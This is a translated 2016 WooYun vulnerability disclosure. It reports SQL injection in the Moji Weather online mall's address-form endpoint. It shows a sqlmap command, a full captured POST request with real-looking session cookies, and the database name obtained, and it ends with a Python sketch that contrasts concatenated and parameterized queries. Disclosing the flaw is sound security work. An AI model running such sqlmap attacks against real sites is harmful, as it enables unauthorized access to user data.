Vulnerability summary

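Bug ID: wooyun-2016-0200335

Title: SQL injection somewhere in Moji Weather (墨迹天气)

Vendor: mojichina.com

Author: 黑色键盘丶

Submitted: 2016-04-25 07:53

Fixed: 2016-06-11 16:00

Published: 2016-06-11 16:00

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 10

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]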



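Vulnerability details

Disclosure status:

2016-04-25: Details reported to the vendor; awaiting vendor handling
2016-04-27: Vendor confirmed; details disclosed to the vendor only
2016-05-07: Details disclosed to core white hats and experts in related fields
2016-05-17: Details disclosed to regular white hats
2016-05-27: Details disclosed to intern white hats
2016-06-11: Details disclosed to the public

Brief description:

RT (see title)

Detailed description: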

POST injection: sqlmap.py -r 1.txt --dbs
------------- POST request --------------------
POST /myshop/addnewaddress HTTP/1.1
Host: mall.moji.com
Proxy-Connection: keep-alive
Content-Length: 223
Accept: application/json
Origin: http://mall.moji.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://mall.moji.com/appmall/addmyaddress/303/0/0//30912644
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: 95c3_f2f1_saltkey=BnP2jU2i; 95c3_f2f1_lastvisit=1461512525; _gat=1; 95c3_f2f1_ulastactivity=007bVQljxo3T7iodgIY6kXKWLQYtnR0mUrYaTjRxDXBEsuc%2F5AWU; 95c3_f2f1_auth=8d28nu8ZL8lUxTNB38jCZtcm814riUpex1CN9Ul0DpNNNq%2BiFUY6NhqEtVTuLmxSjjg911m6O1ZPqz9J5svuEgrfzA; 95c3_f2f1_nofavfid=1; 95c3_f2f1_home_diymode=1; 95c3_f2f1_sid=lcN6TE; 95c3_f2f1_lastact=1461516316%09home.php%09spacecp; 95c3_f2f1_noticeTitle=1; PHPSESSID=tuepaaqgk46jkqsudff50c16r6; channel=default; 303=%7B%22buy_way%22%3A%220%22%2C%22way_id%22%3A%220%22%7D; goods_id=303; sku_total=1; product_size01=%E9%93%B6%E8%89%B2%E9%95%9C%E7%89%87; product_num=1; moji_sessionid=AES6D7177316B516A7A39316874306E4763612F4E4759513D3D; snsid=30912644; good_data_product_no=%5B%22303%22%5D; good_data_name_json=%5B%223M%5Cu62a4%5Cu76ee%5Cu955c1791T%5C%2F1790G%22%5D; product_price_json=%5B%2269.00%22%5D; shop_price_json=%5B%2299.00%22%5D; goods_ids=303; __ads_session=KIROnPAYtgie93EAKwA=; _ga=GA1.2.1391845924.1461516131; _yd_=GA1.3.451698722.1461516330; Hm_lvt_4bd2403ae3a05b9a989b28908b95bef5=1461516331,1461516647; Hm_lpvt_4bd2403ae3a05b9a989b28908b95bef5=1461516652; province=undefined; city=undefined; county=undefined
username=%E9%BB%91%E8%89%B2%E9%94%AE%E7%9B%98&province=%E4%B8%8A%E6%B5%B7%E5%B8%82&city=%E4%B8%8A%E6%B5%B7%E5%B8%82&district=%E5%AE%9D%E5%B1%B1%E5%8C%BA&addressDetail=11111&postcode=111111&mobile=13444455555&userid=30912644


Database

available databases [1]:
[*] mojimall



Proof of vulnerability:

(Same sqlmap command, POST request and database listing as in the detailed description above.)

Suggested fix:

Filtering

Copyright notice: when reprinting, please credit the source 黑色键盘丶@乌云 (WooYun)
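
The report does not show the server-side code or say which parameter is injectable. As an added example (not code from the report or the vendor), the sketch below takes the form fields from the POST body and contrasts a string-concatenated INSERT with a bound-parameter one; the `address` table, the function names, the SQLite backend and the digit formats are assumptions.

```python
import re
import sqlite3

# Form fields taken from the POST body shown in the report.
FIELDS = ("username", "province", "city", "district",
          "addressDetail", "postcode", "mobile", "userid")
# Assumed formats for the numeric fields (not stated on the page).
NUMERIC = {"postcode": r"[0-9]{6}", "mobile": r"[0-9]{11}",
           "userid": r"[0-9]{1,12}"}

def open_db():
    # Constructed in-memory table standing in for the shop's address table.
    db = sqlite3.connect(":memory:")
    columns = ", ".join(f"{name} TEXT" for name in FIELDS)
    db.execute(f"CREATE TABLE address ({columns})")
    return db

def add_address_concat(db, form):
    # Vulnerable pattern: request values become part of the SQL text itself.
    values = ", ".join("'%s'" % form[name] for name in FIELDS)
    db.execute("INSERT INTO address VALUES (%s)" % values)

def add_address_bound(db, form):
    # Hardened pattern: allow-list the numeric fields, then bind every value.
    for field, pattern in NUMERIC.items():
        if not re.fullmatch(pattern, form.get(field, "")):
            raise ValueError(f"rejected {field}")
    placeholders = ", ".join("?" for _ in FIELDS)
    db.execute(f"INSERT INTO address VALUES ({placeholders})",
               [form[name] for name in FIELDS])

def stored_detail(db):
    return [row[0] for row in db.execute("SELECT addressDetail FROM address")]

# Constructed sample: an ordinary address that happens to contain a quote.
SAMPLE = {"username": "test", "province": "Shanghai", "city": "Shanghai",
          "district": "Baoshan", "addressDetail": "5 O'Brien Road",
          "postcode": "111111", "mobile": "13444455555", "userid": "30912644"}

if __name__ == "__main__":
    db = open_db()
    try:
        add_address_concat(db, SAMPLE)
    except sqlite3.Error as exc:
        print("concatenated query broke on a quote:", exc)
    add_address_bound(db, SAMPLE)
    print(stored_detail(db))
```

A quote in ordinary data is enough to change how the concatenated statement parses, which is why filtering alone is fragile; with bound parameters the value never reaches the SQL parser as code.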


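Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 6

Confirmed: 2016-04-27 15:52

Vendor reply:

Thanks for the heads-up.

Latest status:

None yet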